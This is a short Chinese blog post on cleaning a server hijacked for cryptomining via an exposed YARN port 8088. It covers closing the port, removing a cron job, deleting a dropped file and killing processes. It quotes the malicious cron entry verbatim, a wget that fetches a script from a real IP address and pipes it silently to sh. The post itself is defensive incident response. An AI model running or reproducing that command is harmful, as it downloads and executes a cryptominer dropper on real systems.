服务器疑似中毒,被拿去挖矿了,该如何解决。
特征:CPU跑满,并且用top查看发现是user为yarn的用户。
解决方法:
①关闭8088端口
②用户切换至yarn并查看定时任务:sudo -u yarn crontab -e
在列表中可以找到类似的任务: * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
删除此定时任务,保存退出。
③查看/var/tmp目录,发现多出了一个java文件,删除它。
④top查看,删除user为yarn的command为java与bash64的进程:kill pid ;多个任务的话:killall command
服务器疑似中毒,被拿去挖矿了,该如何解决。 特征:CPU跑满,并且用top查看发现是user为yarn的用户。 解...
为方便调试 redis没有设置IP限制,导致服务器被入侵了挖矿了, CPU 一直 100%。 解决方案: 删定时任...
今天晚上,疑似食物中毒了。 吃晚饭的的的时候,吃了一种不知名植物的根和土鸡相炖,据说是补血补气的良药,结果,我和Z...
在阿里云买了一台服务器,临时搭建了一套harbor仓库,用来做镜像构建测试,默认阿里云是没有开放80端口和2375...
香港的一个比特币【挖矿】工厂,1米高的地方容纳了92个刀片服务器,如此大功率的电子设备如何解决散热问题呢? 3M™...
干货点:如何巧妙应对微信公众号开发只提供一个服务器地址?不如来看看我如何巧妙使用反射解决该问题吧! 最近被女朋友要...
Mac电脑作为相对封闭的一个系统,它会中毒吗?如果有一天Mac电脑产生了疑似中毒或者遭到恶意不知名攻击的现象,那又...
遇到很多次客户服务器被入侵的情况,有些服务器被植入木马后门、有些被检查出有挖矿程序、有些发现登录密码不对,被恶意登...
沼气是什么?农村农民清掏化粪池该怎么样预防沼气中毒? ·农村化粪池的沼气是什么? ·该如何预防沼气中毒? 5月13...
120值班,突然接到护士电话要求内科出诊,电话那头汇报疑似中药中毒,中药中毒?心中一阵疑虑。 120紧...
本文标题:服务器疑似中毒,被拿去挖矿了,该如何解决。
本文链接:https://www.haomeiwen.com/subject/lobfbctx.html
网友评论